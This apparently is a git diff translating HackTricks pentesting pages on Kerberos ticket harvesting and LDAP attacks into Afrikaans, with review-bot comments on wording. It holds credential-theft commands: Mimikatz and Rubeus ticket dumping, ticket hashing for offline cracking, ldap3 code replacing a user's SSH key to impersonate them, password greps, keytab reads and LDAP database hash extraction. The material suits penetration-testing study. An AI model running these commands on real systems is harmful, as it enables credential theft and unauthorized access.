-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
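Review bot: "hercules.sh-skripsie" in the "Oorsig van Sleutelringonttrekking" and "Hulpmiddel vir Onttrekking van Kaartjies" paragraphs uses "skripsie", which in Afrikaans is a thesis or dissertation, not a shell script; the term is "hercules.sh-skrip". The closing support block in this file renders "github repos" as "GitHub-opslagplekke", while the same boilerplate in the other files of this patch says "github-repos" and "github-opslag"; since the block is identical on every page, pick one rendering and apply it everywhere.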
- - diff --git a/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md b/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md index d32b986cd..2fc4cfc87 100644 --- a/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md +++ b/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md @@ -1,32 +1,29 @@ -# Harvesting tickets from Windows +# Oes van kaartjies vanaf Windows
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Tickets in Windows are managed and stored by the **lsass** (Local Security Authority Subsystem Service) process, responsible for handling security policies. To extract these tickets, it's necessary to interface with the lsass process. A non-administrative user can only access their own tickets, while an administrator has the privilege to extract all tickets on the system. For such operations, the tools **Mimikatz** and **Rubeus** are widely employed, each offering different commands and functionalities. +Kaartjies in Windows word bestuur en gestoor deur die **lsass** (Local Security Authority Subsystem Service) proses, wat verantwoordelik is vir die hanteer van sekuriteitsbeleide. Om hierdie kaartjies te onttrek, is dit nodig om met die lsass-proses te kommunikeer. 'n Nie-administratiewe gebruiker kan slegs toegang verkry tot hul eie kaartjies, terwyl 'n administrateur die voorreg het om alle kaartjies op die stelsel te onttrek. Vir sulke operasies word die gereedskap **Mimikatz** en **Rubeus** wyd gebruik, elk met verskillende opdragte en funksionaliteite. ### Mimikatz -Mimikatz is a versatile tool that can interact with Windows security. It's used not only for extracting tickets but also for various other security-related operations. - +Mimikatz is 'n veelsydige gereedskap wat kan kommunikeer met Windows-sekuriteit. Dit word nie net gebruik om kaartjies te onttrek nie, maar ook vir verskeie ander sekuriteitsverwante operasies. ```bash # Extracting tickets using Mimikatz sekurlsa::tickets /export ``` - ### Rubeus -Rubeus is a tool specifically tailored for Kerberos interaction and manipulation. It's used for ticket extraction and handling, as well as other Kerberos-related activities. - +Rubeus is 'n instrument wat spesifiek ontwerp is vir Kerberos-interaksie en manipulasie. Dit word gebruik vir die onttrekking en hanteer van kaartjies, sowel as ander Kerberos-verwante aktiwiteite. ```bash # Dumping all tickets using Rubeus .\Rubeus dump 
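Review bot: The blank line between each introductory paragraph and the ```bash fence that follows it is deleted in this hunk ("-Mimikatz is a versatile tool ... -" is replaced by "+Mimikatz is 'n veelsydige gereedskap ... ```bash", and the Rubeus paragraph is treated the same way); that is a layout change unrelated to the translation and it departs from the spacing the rest of the book keeps around fences, so restore the blank lines. In the first paragraph, "verantwoordelik is vir die hanteer van sekuriteitsbeleide" reads better with the noun: "vir die hantering van sekuriteitsbeleide".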
@@ -45,22 +42,21 @@ Rubeus is a tool specifically tailored for Kerberos interaction and manipulation # Converting a ticket to hashcat format for offline cracking .\Rubeus.exe hash /ticket: ``` +Wanneer jy hierdie opdragte gebruik, verseker dat jy plaatshouers soos `` en `` vervang met die werklike Base64-geënkripteerde kaartjie en Logon ID onderskeidelik. Hierdie gereedskap bied uitgebreide funksionaliteit vir die bestuur van kaartjies en die interaksie met die sekuriteitsmeganismes van Windows. -When using these commands, ensure to replace placeholders like `` and `` with the actual Base64 encoded ticket and Logon ID respectively. These tools provide extensive functionality for managing tickets and interacting with the security mechanisms of Windows. - -## References +## Verwysings * [https://www.tarlogic.com/en/blog/how-to-attack-kerberos/](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
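Review bot: "plaatshouers" in the added paragraph after the Rubeus hash command is the Dutch word; the Afrikaans form is "plekhouers". That sentence also carries the placeholders as empty backticks ("plaatshouers soos `` en ``"), exactly as the removed English line does, so the names the reader is supposed to substitute are missing in both versions and the source sentence needs repairing before it is translated. The footer line "Deel jou haktruuks deur PR's ... github-opslag" spells "hacktruuks" differently from the other footers in this patch and introduces a third rendering of "github repos"; align it with the others.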
diff --git a/network-services-pentesting/pentesting-ldap.md b/network-services-pentesting/pentesting-ldap.md index 200c36ea8..1dc5da889 100644 --- a/network-services-pentesting/pentesting-ldap.md +++ b/network-services-pentesting/pentesting-ldap.md @@ -2,36 +2,33 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-The use of **LDAP** (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint. +Die gebruik van **LDAP** (Lightweight Directory Access Protocol) is hoofsaaklik vir die opspoor van verskillende entiteite soos organisasies, individue, en hulpbronne soos lêers en toestelle binne netwerke, beide openbare en private. Dit bied 'n gestroomlynste benadering in vergelyking met sy voorganger, DAP, deur 'n kleiner kodevoetspoor te hê. -LDAP directories are structured to allow their distribution across several servers, with each server housing a **replicated** and **synchronized** version of the directory, referred to as a Directory System Agent (DSA). Responsibility for handling requests lies entirely with the LDAP server, which may communicate with other DSAs as needed to deliver a unified response to the requester. +LDAP-gidse is gestruktureer om hulle verspreiding oor verskeie bedieners moontlik te maak, met elke bediener wat 'n **gerepliseerde** en **gesinchroniseerde** weergawe van die gids huisves, wat verwys word as 'n Directory System Agent (DSA). Die verantwoordelikheid vir die hanteer van versoeke lê heeltemal by die LDAP-bediener, wat indien nodig met ander DSA's kan kommunikeer om 'n eenvormige antwoord aan die versoeker te lewer. -The LDAP directory's organization resembles a **tree hierarchy, starting with the root directory at the top**. This branches down to countries, which further divide into organizations, and then to organizational units representing various divisions or departments, finally reaching the individual entities level, including both people and shared resources like files and printers. - -**Default port:** 389 and 636(ldaps). 
Global Catalog (LDAP in ActiveDirectory) is available by default on ports 3268, and 3269 for LDAPS. +Die organisasie van die LDAP-gids lyk soos 'n **boomhiërargie, wat begin met die wortelgids bo-aan**. Dit vertak na lande, wat verder verdeel in organisasies, en dan na organisatoriese eenhede wat verskillende afdelings of departemente verteenwoordig, en uiteindelik die individuele entiteitevlak bereik, insluitend mense en gedeelde hulpbronne soos lêers en drukkers. +**Verstekpoort:** 389 en 636 (ldaps). Die Globale Katalogus (LDAP in ActiveDirectory) is verstek beskikbaar op poorte 3268 en 3269 vir LDAPS. ``` PORT STATE SERVICE REASON 389/tcp open ldap syn-ack 636/tcp open tcpwrapped ``` +### LDAP Data Interchange-formaat -### LDAP Data Interchange Format - -LDIF (LDAP Data Interchange Format) defines the directory content as a set of records. It can also represent update requests (Add, Modify, Delete, Rename). - +LDIF (LDAP Data Interchange Format) definieer die gidsinhoud as 'n stel rekords. Dit kan ook opdateringsversoeke (Voeg by, Wysig, Verwyder, Hernoem) voorstel. ```bash dn: dc=local dc: local 
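Review bot: "'n gestroomlynste benadering" in the first paragraph of the LDAP introduction is a superlative; the participle intended is "gestroomlynde" ("'n gestroomlynde benadering"). The heading "### LDAP Data Interchange-formaat" mixes the English expansion of the acronym with an Afrikaans suffix; either keep it as "LDAP Data Interchange Format", since LDIF is the proper name and is expanded that way in the sentence directly below, or translate the whole heading.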
@@ -60,16 +57,14 @@ ou: mail: pepe@hacktricks.xyz phone: 23627387495 ``` +* Lyne 1-3 definieer die topvlakdomein local +* Lyne 5-8 definieer die eerste vlakdomein moneycorp (moneycorp.local) +* Lyne 10-16 definieer 2 organisatoriese eenhede: dev en sales +* Lyne 18-26 skep 'n objek van die domein en ken eienskappe met waardes toe -* Lines 1-3 define the top level domain local -* Lines 5-8 define the first level domain moneycorp (moneycorp.local) -* Lines 10-16 define 2 organizational units: dev and sales -* Lines 18-26 create an object of the domain and assign attributes with values - -## Write data - -Note that if you can modify values you could be able to perform really interesting actions. For example, imagine that you **can change the "sshPublicKey" information** of your user or any user. It's highly probable that if this attribute exist, then **ssh is reading the public keys from LDAP**. If you can modify the public key of a user you **will be able to login as that user even if password authentication is not enabled in ssh**. +## Skryf data +Let daarop dat as jy waardes kan wysig, jy baie interessante aksies kan uitvoer. Byvoorbeeld, stel jou voor jy **kan die "sshPublicKey" inligting verander** van jou gebruiker of enige gebruiker. Dit is baie waarskynlik dat as hierdie eienskap bestaan, dan **lees ssh die openbare sleutels vanaf LDAP**. As jy die openbare sleutel van 'n gebruiker kan wysig, **sal jy in staat wees om as daardie gebruiker in te teken selfs as wagwoordverifikasie nie in ssh geaktiveer is nie**. ```bash # Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/ >>> import ldap3 
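Review bot: The blank lines separating "## Skryf data" from its paragraph, and that paragraph from the ```bash fence below it, are dropped in this hunk (the removed "-## Write data", "-" and "-Note that if you can modify values ..." lines had them); restore them, since the spacing around headings and fences is not part of the translation and the rest of the book keeps it.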
@@ -81,63 +76,55 @@ True u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN' >>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa 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 badguy@evil'])]}) ``` +## Sniff duidelike wagwoorde -## Sniff clear text credentials +As LDAP sonder SSL gebruik word, kan jy **duidelike wagwoorde in die netwerk duidelik sien**. -If LDAP is used without SSL you can **sniff credentials in plain text** in the network. +Jy kan ook 'n **MITM**-aanval in die netwerk uitvoer **tussen die LDAP-bediener en die kliënt**. Hier kan jy 'n **Downgrade-aanval** uitvoer sodat die kliënt die **duidelike wagwoorde** gebruik om aan te meld. -Also, you can perform a **MITM** attack in the network **between the LDAP server and the client.** Here you can make a **Downgrade Attack** so the client with use the **credentials in clear text** to login. +**As SSL gebruik word**, kan jy probeer om 'n **MITM** uit te voer soos hierbo genoem, maar deur 'n **vals sertifikaat** aan te bied. As die **gebruiker dit aanvaar**, kan jy die verifikasiemetode afgradeer en die wagwoorde weer sien. -**If SSL is used** you can try to make **MITM** like the mentioned above but offering a **false certificate**, if the **user accepts it**, you are able to Downgrade the authentication method and see the credentials again. 
+## Anonieme Toegang -## Anonymous Access - -### Bypass TLS SNI check - -According to [**this writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) just by accessing the LDAP server with an arbitrary domain name (like company.com) he was able to contact the LDAP service and extract information as an anonymous user: +### Om TLS SNI-kontrole te omseil +Volgens [**hierdie verslag**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) was dit net deur toegang tot die LDAP-bediener met 'n willekeurige domeinnaam (soos company.com) te verkry, moontlik om die LDAP-diens te kontak en inligting as 'n anonieme gebruiker te onttrek: ```bash ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" + ``` +### LDAP anonieme bindmiddels -### LDAP anonymous binds +[LDAP anonieme bindmiddels](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) maak dit vir **ongeagtekteerde aanvallers** moontlik om inligting uit die domein te bekom, soos 'n volledige lys van gebruikers, groepe, rekenaars, gebruikersrekeningseienskappe en die domein wagwoordbeleid. Dit is 'n **ouditiewe konfigurasie**, en vanaf Windows Server 2003 word slegs geautehtiseerde gebruikers toegelaat om LDAP-versoeke te inisieer.\ +Nietemin kan administrateurs 'n spesifieke toepassing moes **opstel om anonieme bindmiddels toe te laat** en meer toegang as bedoel is, uitgereik het, waarmee ongeautehtiseerde gebruikers toegang tot alle voorwerpe in AD verkry. -[LDAP anonymous binds](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) allow **unauthenticated attackers** to retrieve information from the domain, such as a complete listing of users, groups, computers, user account attributes, and the domain password policy. 
This is a **legacy configuration**, and as of Windows Server 2003, only authenticated users are permitted to initiate LDAP requests.\ -However, admins may have needed to **set up a particular application to allow anonymous binds** and given out more than the intended amount of access, thereby giving unauthenticated users access to all objects in AD. +## Geldige Gelde -## Valid Credentials - -If you have valid credentials to login into the LDAP server, you can dump all the information about the Domain Admin using: +As jy geldige gelde het om in te teken op die LDAP-bediener, kan jy alle inligting oor die Domeinadministrateur aflaai deur gebruik te maak van: [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump) - ```bash -pip3 install ldapdomaindump +pip3 install ldapdomaindump ldapdomaindump [-r ] -u '\' -p '' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir] ``` - ### [Brute Force](../generic-methodologies-and-resources/brute-force.md#ldap) -## Enumeration +## Opname -### Automated - -Using this you will be able to see the **public information** (like the domain name)**:** +### Outomaties +Deur hiervan gebruik te maak, sal jy in staat wees om die **openbare inligting** (soos die domeinnaam) te sien: ```bash nmap -n -sV --script "ldap* and not brute" #Using anonymous credentials ``` - ### Python
-See LDAP enumeration with python +Sien LDAP opsporing met python -You can try to **enumerate a LDAP with or without credentials using python**: `pip3 install ldap3` - -First try to **connect without** credentials: +Jy kan probeer om 'n LDAP te **opspoor met of sonder geloofsbriewe met behulp van python**: `pip3 install ldap3` +Eerste probeer om **sonder** geloofsbriewe te verbind: ```bash >>> import ldap3 >>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True) @@ -146,39 +133,31 @@ First try to **connect without** credentials: True >>> server.info ``` - -If the response is `True` like in the previous example, you can obtain some **interesting data** of the LDAP (like the **naming context** or **domain name**) server from: - +As die antwoord `True` is, soos in die vorige voorbeeld, kan jy sekere **interessante data** van die LDAP (soos die **naamgewingskonteks** of **domeinnaam**) bediener verkry vanaf: ```bash >>> server.info DSA info (from DSE): Supported LDAP versions: 3 -Naming contexts: +Naming contexts: dc=DOMAIN,dc=DOMAIN ``` - -Once you have the naming context you can make some more exciting queries. This simply query should show you all the objects in the directory: - +Sodra jy die naamkonteks het, kan jy 'n paar opwindende navrae maak. Hierdie eenvoudige navraag behoort jou al die voorwerpe in die gids te wys: ```bash >>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*') True >> connection.entries ``` - -Or **dump** the whole ldap: - +Of **dump** die hele ldap: ```bash >> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword') True >>> connection.entries ``` -
### windapsearch -[**Windapsearch**](https://github.com/ropnop/windapsearch) is a Python script useful to **enumerate users, groups, and computers from a Windows** domain by utilizing LDAP queries. - +[**Windapsearch**](https://github.com/ropnop/windapsearch) is 'n Python-skrips wat nuttig is om gebruikers, groepe en rekenaars van 'n Windows-domein te tel deur gebruik te maak van LDAP-navrae. ```bash # Get computers python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers @@ -191,11 +170,9 @@ python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --d # Get Privileged Users python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users ``` - ### ldapsearch -Check null credentials or if your credentials are valid: - +Kontroleer nul-gedagtes of as jou geloofsbriewe geldig is: ```bash ldapsearch -x -H ldap:// -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=" ldapsearch -x -H ldap:// -D '\' -w '' -b "DC=<1_SUBDOMAIN>,DC=" @@ -206,13 +183,11 @@ ldapsearch -x -H ldap:// -D '\' -w '' -b "DC=<1_ search: 2 result: 1 Operations error text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera - tion a successful bind must be completed on the connection., data 0, v3839 +tion a successful bind must be completed on the connection., data 0, v3839 ``` +As jy iets vind wat sê dat die "_bind voltooi moet word_", beteken dit dat die geloofsbriewe nie korrek is nie. -If you find something saying that the "_bind must be completed_" means that the credentials are incorrect. - -You can extract **everything from a domain** using: - +Jy kan **alles van 'n domein** onttrek deur gebruik te maak van: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "DC=<1_SUBDOMAIN>,DC=" -x Simple Authentication 
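Review bot: Several terms in the "Sniff", "Anonieme Toegang", "Geldige Gelde" and "Opname" sections are mistranslated rather than merely awkward. "LDAP anonieme bindmiddels" renders LDAP binds as "binding agents" (adhesives); use "anonieme binds" or "anonieme bindings". "ouditiewe konfigurasie" says "auditory configuration" where the removed line says "legacy configuration" ("verouderde konfigurasie"). "## Geldige Gelde" means "valid funds"; "Valid Credentials" is "Geldige geloofsbriewe", the word this same file already uses in the Python section. "## Opname" (a recording or survey) for "Enumeration" should be "Enumerasie", and "ongeagtekteerde", "geautehtiseerde" and "ongeautehtiseerde" are typos for "ongeoutentiseerde" and "geoutentiseerde". The hunk also inserts a stray "+" blank line inside the ldapsearch ```bash block in the TLS SNI section; remove it so the code block stays unchanged.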
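Review bot: "Eerste probeer om **sonder** geloofsbriewe te verbind" should read "Probeer eers om **sonder** geloofsbriewe te verbind" ("eerste" is the adjective, "eers" the adverb). The hunk also turns "-Naming contexts: " into "+Naming contexts:" inside the ```bash block that quotes the server.info output; that is a whitespace-only edit to captured program output and does not belong in a translation commit. In the windapsearch paragraph, "Python-skrips" should be "Python-skrip", "te tel" (to count) should be "te enumereer", and the bold on "enumerate users, groups, and computers from a Windows" from the removed line has been dropped.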
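Review bot: "Kontroleer nul-gedagtes of as jou geloofsbriewe geldig is" translates "null credentials" as "null thoughts" ("gedagtes"); it should read "Kontroleer null-geloofsbriewe (anonieme bind) of jou geloofsbriewe geldig is". Further down, the hunk strips the leading space from the continuation line of the quoted ldapsearch error ("- tion a successful bind must be completed on the connection." becomes "+tion a successful bind ..."); that line is program output inside a ```bash block and should be left exactly as captured.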
@@ -221,69 +196,49 @@ ldapsearch -x -H ldap:// -D '\' -w '' -b "DC=<1_ -w My password -b Base site, all data from here will be given ``` - -Extract **users**: - +Trek **gebruikers** uit: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=" #Example: ldapsearch -x -H ldap:// -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local" ``` - -Extract **computers**: - +Ekstraeer **rekenaars**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=" ``` - -Extract **my info**: - +Ekstrakteer **my inligting**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=,CN=Users,DC=<1_SUBDOMAIN>,DC=" ``` - -Extract **Domain Admins**: - +Trek **Domain Admins** uit: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=" ``` - -Extract **Domain Users**: - +Onttrek **Domain-gebruikers**: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=" ``` - -Extract **Enterprise Admins**: - +Trek **Enterprise Admins** uit: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=" ``` - -Extract **Administrators**: - +Trek **Administrateurs** uit: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=" ``` - -Extract **Remote Desktop Group**: - +Trek die **Remote Desktop Groep** uit: ```bash ldapsearch -x -H ldap:// -D '\' -w '' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=" ``` - -To see if you have access to any password you can use grep after executing one of the queries: - +Om te sien of jy toegang het tot enige wagwoord, kan jy grep gebruik nadat jy een van die navrae uitgevoer het: ```bash | grep -i -A2 -B2 "userpas" ``` - -Please, notice that the passwords that you can find here could not be the real ones... +Let asseblief daarop dat die wagwoorde wat jy hier kan vind, nie noodwendig die regte wagwoorde is nie... 
#### pbis -You can download **pbis** from here: [https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/) and it's usually installed in `/opt/pbis`.\ -**Pbis** allow you to get basic information easily: - +Jy kan **pbis** hier aflaai: [https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/) en dit word gewoonlik geïnstalleer in `/opt/pbis`.\ +**Pbis** maak dit maklik om basiese inligting te bekom: ```bash #Read keytab file ./klist -k /etc/krb5.keytab 
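Review bot: The eight "Extract ..." lead-ins in this hunk are translated four different ways ("Trek ... uit", "Ekstraeer", "Ekstrakteer", "Onttrek"), and "Ekstraeer" is a typo; use a single verb, "Onttrek", for all of them. The group names in those lead-ins must also stay as they appear in the ldapsearch -b argument under each one: "Onttrek **Domain-gebruikers**" sits above "CN=Domain Users", "Trek **Administrateurs** uit" above "CN=Administrators" and "Trek die **Remote Desktop Groep** uit" above "CN=Remote Desktop Users", so keep them as **Domain Users**, **Administrators** and **Remote Desktop Users**, consistent with the untranslated **Domain Admins** and **Enterprise Admins** items in the same hunk.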
@@ -322,118 +277,113 @@ You can download **pbis** from here: [https://github.com/BeyondTrust/pbis-open/] #Get description of each user ./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n | grep "CN" | while read line; do - echo "$line"; - ./adtool --keytab=/etc/krb5.keytab -n -a lookup-object --dn="$line" --attr "description"; - echo "======================" +echo "$line"; +./adtool --keytab=/etc/krb5.keytab -n -a lookup-object --dn="$line" --attr "description"; +echo "======================" done ``` - -## Graphical Interface +## Grafiese Gebruikerskoppelvlak ### Apache Directory -[**Download Apache Directory from here**](https://directory.apache.org/studio/download/download-linux.html). You can find an [example of how to use this tool here](https://www.youtube.com/watch?v=VofMBg2VLnw\&t=3840s). +[**Laai Apache Directory hier af**](https://directory.apache.org/studio/download/download-linux.html). Jy kan 'n [voorbeeld van hoe om hierdie instrument te gebruik hier vind](https://www.youtube.com/watch?v=VofMBg2VLnw\&t=3840s). 
### jxplorer -You can download a graphical interface with LDAP server here: [http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html) +Jy kan 'n grafiese koppelvlak met LDAP-bediener hier aflaai: [http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html) -By default is is installed in: _/opt/jxplorer_ +Standaard word dit geïnstalleer in: _/opt/jxplorer_ ![](<../.gitbook/assets/image (22) (1).png>) ### Godap -You can access it in [https://github.com/Macmod/godap](https://github.com/Macmod/godap) +Jy kan dit toegang in [https://github.com/Macmod/godap](https://github.com/Macmod/godap) -## Authentication via kerberos +## Verifikasie via kerberos -Using `ldapsearch` you can **authenticate** against **kerberos instead** of via **NTLM** by using the parameter `-Y GSSAPI` +Met behulp van `ldapsearch` kan jy **verifieer** teen **kerberos in plaas daarvan** van via **NTLM** deur die parameter `-Y GSSAPI` te gebruik. ## POST -If you can access the files where the databases are contained (could be in _/var/lib/ldap_). You can extract the hashes using: - +As jy toegang het tot die lêers waar die databasisse bevat word (kan in _/var/lib/ldap_ wees), kan jy die hakse uittrek deur die volgende te gebruik: ```bash cat /var/lib/ldap/*.bdb | grep -i -a 